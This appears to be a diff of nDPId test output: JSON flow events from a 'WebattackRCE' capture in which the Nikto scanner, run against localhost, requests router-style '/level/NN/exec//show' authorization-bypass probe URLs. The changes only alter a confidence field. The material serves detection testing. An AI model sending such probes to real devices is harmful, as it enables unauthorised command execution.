{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/72\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001319)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1576420277691,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277691,"pkt":"AAAAAAAAAAAAAAAACABFAADIVsBAAEAG5W1\/AAABfwAAAcZ0H5BhJ2+x3S4KSIAYAED+vAAAAQEICp1m\/uOdZv7jR0VUIC9sZXZlbC83My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/73\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001320)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/73\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001320)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1576420277693,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277693,"pkt":"AAAAAAAAAAAAAAAACABFAADIebZAAEAGwnd\/AAABfwAAAcZ2H5BNR0C8mP2KqIAYAED+vAAAAQEICp1m\/uWdZv7lR0VUIC9sZXZlbC83NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/74\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001321)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/74\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001321)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1576420277695,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277695,"pkt":"AAAAAAAAAAAAAAAACABFAADIMBZAAEAGDBh\/AAABfwAAAcZ4H5ACzwkce7l1k4AYAED+vAAAAQEICp1m\/uadZv7mR0VUIC9sZXZlbC83NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/75\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001322)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/75\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001322)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1576420277699,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277699,"pkt":"AAAAAAAAAAAAAAAACABFAADIwYhAAEAGeqV\/AAABfwAAAcZ6H5CkKPiYt3JQbIAYAED+vAAAAQEICp1m\/uudZv7rR0VUIC9sZXZlbC83Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjMpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/76\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001323)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/76\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001323)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1576420277701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277701,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/s1AAEAGPWB\/AAABfwAAAcZ8H5AcB8fbr66aJ4AYAED+vAAAAQEICp1m\/u2dZv7tR0VUIC9sZXZlbC83Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/77\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001324)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/77\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001324)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1576420277702,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277702,"pkt":"AAAAAAAAAAAAAAAACABFAADIfWpAAEAGvsN\/AAABfwAAAcZ+H5A9kER6aVFtF4AYAED+vAAAAQEICp1m\/u6dZv7uR0VUIC9sZXZlbC83OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/78\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001325)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/78\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001325)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1576420277703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277703,"pkt":"AAAAAAAAAAAAAAAACABFAADIZuhAAEAG1UV\/AAABfwAAAcaAH5DHm1\/1JwgzKoAYAED+vAAAAQEICp1m\/u+dZv7vR0VUIC9sZXZlbC83OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/79\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001326)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/79\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001326)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1576420277705,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277705,"pkt":"AAAAAAAAAAAAAAAACABFAADIi\/NAAEAGsDp\/AAABfwAAAcaCH5DTprLkQgBQzIAYAED+vAAAAQEICp1m\/vGdZv7xR0VUIC9sZXZlbC84MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/80\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 